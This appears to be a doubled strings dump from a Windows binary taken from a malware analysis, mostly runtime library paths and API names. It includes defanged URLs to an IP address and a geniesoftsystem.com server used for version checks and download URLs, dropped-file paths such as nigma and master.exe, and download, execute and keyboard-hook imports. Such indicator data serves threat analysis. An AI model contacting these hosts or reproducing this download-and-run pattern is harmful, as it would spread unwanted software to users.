
m_pd.hDC =

m_pd.hDC =

m_pd.hwndOwner =

m_pd.hwndOwner =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appprnt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appprnt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscommandslistbox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscommandslistbox.cpp

@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpickerctrl.cpp

@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpickerctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomcolorspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomcolorspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstandardcolorspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstandardcolorspropertypage.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpropertysheet.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpropertysheet.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dcprev.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dcprev.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c

Client hook allocation failure at file %hs line %d.

Client hook allocation failure at file %hs line %d.

Memory allocated at %hs(%d).

Memory allocated at %hs(%d).

Client hook re-allocation failure at file %hs line %d.

Client hook re-allocation failure at file %hs line %d.

HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.

HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory after end of heap buffer.

CRT detected that the application wrote to memory after end of heap buffer.

HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.

HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory before start of heap buffer.

CRT detected that the application wrote to memory before start of heap buffer.

CRT detected that the application wrote to a heap buffer that was freed.

CRT detected that the application wrote to a heap buffer that was freed.

crt block at 0x%p, subtype %x, %Iu bytes long.

crt block at 0x%p, subtype %x, %Iu bytes long.

client block at 0x%p, subtype %x, %Iu bytes long.

client block at 0x%p, subtype %x, %Iu bytes long.

%hs(%d) :

%hs(%d) :

#File Error#(%d) :

#File Error#(%d) :

Data: %s

Data: %s

_CrtDbgReport: String too long or IO Error

_CrtDbgReport: String too long or IO Error

Debug %s!

Debug %s!

Program: %s%s%s%s%s%s%s%s%s%s%s%s

Program: %s%s%s%s%s%s%s%s%s%s%s%s

f:\dd\vctools\crt_bld\self_x86\crt\src\thread.c

f:\dd\vctools\crt_bld\self_x86\crt\src\thread.c

f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c

f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c

%s(%d) : %s

%s(%d) : %s

_CrtDbgReport: String too long or Invalid characters in String

_CrtDbgReport: String too long or Invalid characters in String

f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c

GetProcessWindowStation

GetProcessWindowStation

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c

f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c

Run-Time Check Failure #%d - %s

Run-Time Check Failure #%d - %s

f:\dd\vctools\crt_bld\self_x86\crt\src\input.c

f:\dd\vctools\crt_bld\self_x86\crt\src\input.c

f:\dd\vctools\crt_bld\self_x86\crt\src\output.c

f:\dd\vctools\crt_bld\self_x86\crt\src\output.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c

f:\dd\vctools\crt_bld\self_x86\crt\src\read.c

f:\dd\vctools\crt_bld\self_x86\crt\src\read.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c

operator

operator

f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c

portuguese-brazilian

portuguese-brazilian

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c

%s_%0x

%s_%0x

%s(%d) :

%s(%d) :

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xutility

f:\dd\vctools\crt_bld\self_x86\crt\src\xutility

f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c

f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase

hXXp://159.203.127.87/nigma/index.php/api/check_version?data={"id":"1"}

hXXp://159.203.127.87/nigma/index.php/api/check_version?data={"id":"1"}

hXXp://demo1.geniesoftsystem.com/country_ip/getip.php

hXXp://demo1.geniesoftsystem.com/country_ip/getip.php

C:\ProgramData\country_data.txt

C:\ProgramData\country_data.txt

BrowserControlDemo.cpp

BrowserControlDemo.cpp

/AppData/Roaming/nigma/version_nigma.txt

/AppData/Roaming/nigma/version_nigma.txt

download_url

download_url

hXXp://

hXXp://

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h

AtlThrow: hr = 0x%x

AtlThrow: hr = 0x%x

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h

Warning: implicit LoadString(%u) failed

Warning: implicit LoadString(%u) failed

%Y-%m-%d %H:%M:%S

%Y-%m-%d %H:%M:%S

TimeZoneKeyName

TimeZoneKeyName

C:\ProgramData\nigma.txt

C:\ProgramData\nigma.txt

hXXp://demo1.geniesoftsystem.com/master/index.php/api/getdate

hXXp://demo1.geniesoftsystem.com/master/index.php/api/getdate

C:/ProgramData/installationlimit_data.txt

C:/ProgramData/installationlimit_data.txt

hXXp://demo1.geniesoftsystem.com/master/index.php/api/get_installation_detail?data={"country":"

hXXp://demo1.geniesoftsystem.com/master/index.php/api/get_installation_detail?data={"country":"

BrowserControlDemoDlg.cpp

BrowserControlDemoDlg.cpp

/AppData/Roaming/nigma/uninstaller.exe

/AppData/Roaming/nigma/uninstaller.exe

Advapi32.dll

Advapi32.dll

RegOpenKeyTransactedA

RegOpenKeyTransactedA

hXXp://demo1.geniesoftsystem.com/nigma/html/content.html

hXXp://demo1.geniesoftsystem.com/nigma/html/content.html

D:\Allwyn\Miami\Master(05Apr16)\Release\Master.pdb

D:\Allwyn\Miami\Master(05Apr16)\Release\Master.pdb

GetCPInfo

GetCPInfo

GetWindowsDirectoryA

GetWindowsDirectoryA

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

GetKeyState

GetKeyState

SetWindowsHookExA

SetWindowsHookExA

CreateDialogIndirectParamA

CreateDialogIndirectParamA

UnhookWindowsHookEx

UnhookWindowsHookEx

GetKeyNameTextA

GetKeyNameTextA

MapVirtualKeyA

MapVirtualKeyA

GetAsyncKeyState

GetAsyncKeyState

GetKeyboardLayout

GetKeyboardLayout

GetKeyboardState

GetKeyboardState

MapVirtualKeyExA

MapVirtualKeyExA

USER32.dll

USER32.dll

GetViewportOrgEx

GetViewportOrgEx

GetViewportExtEx

GetViewportExtEx

SetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

SetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

GDI32.dll

GDI32.dll

MSIMG32.dll

MSIMG32.dll

COMDLG32.dll

COMDLG32.dll

WINSPOOL.DRV

WINSPOOL.DRV

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyExA

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyA

RegEnumKeyA

RegEnumKeyExA

RegEnumKeyExA

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

COMCTL32.dll

COMCTL32.dll

SHLWAPI.dll

SHLWAPI.dll

OLEAUT32.dll

OLEAUT32.dll

oledlg.dll

oledlg.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

GdiplusShutdown

GdiplusShutdown

gdiplus.dll

gdiplus.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

OLEACC.dll

OLEACC.dll

IMM32.dll

IMM32.dll

WINMM.dll

WINMM.dll

.PAVCOleException@@

.PAVCOleException@@

.PAVCException@@

.PAVCException@@

.PAVCObject@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCInvalidArgException@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.PAVCUserException@@

.PAVCUserException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCResourceException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCArchiveException@@

.PAVCArchiveException@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AVCMFCToolBarCmdUI@@

.?AVCMFCToolBarCmdUI@@

.PAVCFileException@@

.PAVCFileException@@

.PAVCOleDispatchException@@

.PAVCOleDispatchException@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWnd@@

.?AVCMDIChildWnd@@

.?AVCMDITabProxyWnd@@

.?AVCMDITabProxyWnd@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWnd@@

.?AVCMDIFrameWnd@@

.?AVCMFCCmdUsageCount@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCColorBarCmdUI@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCAcceleratorKey@@

.?AVCMDIClientAreaWnd@@

.?AVCMDIClientAreaWnd@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÁ

zcÁ

.?AVCCmdTarget@@

.?AVCCmdTarget@@

%Documents and Settings%\%current user%\Application Data\master\master.exe

%Documents and Settings%\%current user%\Application Data\master\master.exe

truePA

truePA

7$8(8,8084888

7$8(8,8084888

6 7$7(7,7

6 7$7(7,7

5'6[64748@8

5'6[64748@8

4(575\5]6(777_7

4(575\5]6(777_7

3>

3>

9$:(:,:0:4:

9$:(:,:0:4:

20>0-191

20>0-191

4%4U4h4w4

4%4U4h4w4

24383

24383

:!;4;$

:!;4;$

5o6

5o6

7?7(:7:9;

7?7(:7:9;

8#848>8^8

8#848>8^8

3/3(474$5

3/3(474$5

8%9U9r9

8%9U9r9

1$2C2R2_2

1$2C2R2_2

91:_:.;5;

91:_:.;5;

3%3U3H4U4

3%3U3H4U4

?6?;?@?|?

?6?;?@?|?

? ?$?(?,?

? ?$?(?,?

82878

82878

=%>,>(?0?

=%>,>(?0?

= =$=(=,=

= =$=(=,=

263f3

263f3

11K1U1v1{1

11K1U1v1{1

5 5$5(5,505

5 5$5(5,505

7 7$7(7,707

7 7$7(7,707

6 6$686

6 6$686

; ;$;(;,;0;4;|;

; ;$;(;,;0;4;|;

8 8$8(8,8084888

8 8$8(8,8084888

? ?$?(?,?0?4?8?

? ?$?(?,?0?4?8?

? ?$?(?,?0?

? ?$?(?,?0?

6 6$6(6,6064686

6 6$6(6,6064686

: :$:(:,:0:

: :$:(:,:0:

; ;$;(;,;0;

; ;$;(;,;0;

? ?$?(?,?0?4?8?@?

? ?$?(?,?0?4?8?@?

5(9,9094989

5(9,9094989

: :$:(:,:0:4:8:<:>

: :$:(:,:0:4:8:<:>

1 1$1(1,1014181

1 1$1(1,1014181

9,989\9|9

9,989\9|9

>,>8>\>|>

>,>8>\>|>

3 4@4`4|4

3 4@4`4|4

3$3@3`3|3

3$3@3`3|3

d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_value.cpp

d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_value.cpp

c:\program files\microsoft visual studio 10.0\vc\include\xstring

c:\program files\microsoft visual studio 10.0\vc\include\xstring

c:\program files\microsoft visual studio 10.0\vc\include\xtree

c:\program files\microsoft visual studio 10.0\vc\include\xtree

std::_Tree_const_iterator,class std::allocator >,0> > >::operator *

std::_Tree_const_iterator,class std::allocator >,0> > >::operator *

std::_Tree_const_iterator,class std::allocator >,0> > >::operator

std::_Tree_const_iterator,class std::allocator >,0> > >::operator

std::_Tree_const_iterator,class std::allocator >,0> > >::operator --

std::_Tree_const_iterator,class std::allocator >,0> > >::operator --

std::_Tree_const_iterator,class std::allocator >,0> > >::operator ==

std::_Tree_const_iterator,class std::allocator >,0> > >::operator ==

invalid operator

invalid operator

d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_reader.cpp

d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_reader.cpp

std::_Deque_const_iterator >::operator *

std::_Deque_const_iterator >::operator *

c:\program files\microsoft visual studio 10.0\vc\include\deque

c:\program files\microsoft visual studio 10.0\vc\include\deque

std::_Deque_const_iterator >::operator

std::_Deque_const_iterator >::operator

std::_Deque_const_iterator >::operator *

std::_Deque_const_iterator >::operator *

@std::_Deque_const_iterator >::operator --

@std::_Deque_const_iterator >::operator --

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltransactionmanager.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltransactionmanager.h

hhctrl.ocx

hhctrl.ocx

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h

accKeyboardShortcut

accKeyboardShortcut

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h

SHELL32.DLL

SHELL32.DLL

dwmapi.dll

dwmapi.dll

UxTheme.dll

UxTheme.dll

m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)

m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h

USER32.DLL

USER32.DLL

DIsIndexed()

DIsIndexed()

mscoree.dll

mscoree.dll

^RICHED20.DLL

^RICHED20.DLL

mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE

mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE

wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)

memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)

wcscpy_s(szExeName, 260, L"")

wcscpy_s(szExeName, 260, L"")

__crtMessageWindowW

__crtMessageWindowW

f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c

_CrtCheckMemory()

_CrtCheckMemory()

_CrtIsValidHeapPointer(pUserData)

_CrtIsValidHeapPointer(pUserData)

_CrtSetDbgFlag

_CrtSetDbgFlag

(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)

(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)

_CrtMemCheckpoint

_CrtMemCheckpoint

f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c

("Invalid MBCS character sequence passed to strftime",0)

("Invalid MBCS character sequence passed to strftime",0)

("Invalid MBCS character sequence passed into strftime",0)

("Invalid MBCS character sequence passed into strftime",0)

f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\assert.c

f:\dd\vctools\crt_bld\self_x86\crt\src\assert.c

f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c

ekernel32.dll

ekernel32.dll

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\strdup.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strdup.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c

f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c

i_CrtSetReportHook2

i_CrtSetReportHook2

strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szExeName, 260, "")

strcpy_s(szExeName, 260, "")

__crtMessageWindowA

__crtMessageWindowA

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsspn.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsspn.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicoll.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicoll.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsdec.c

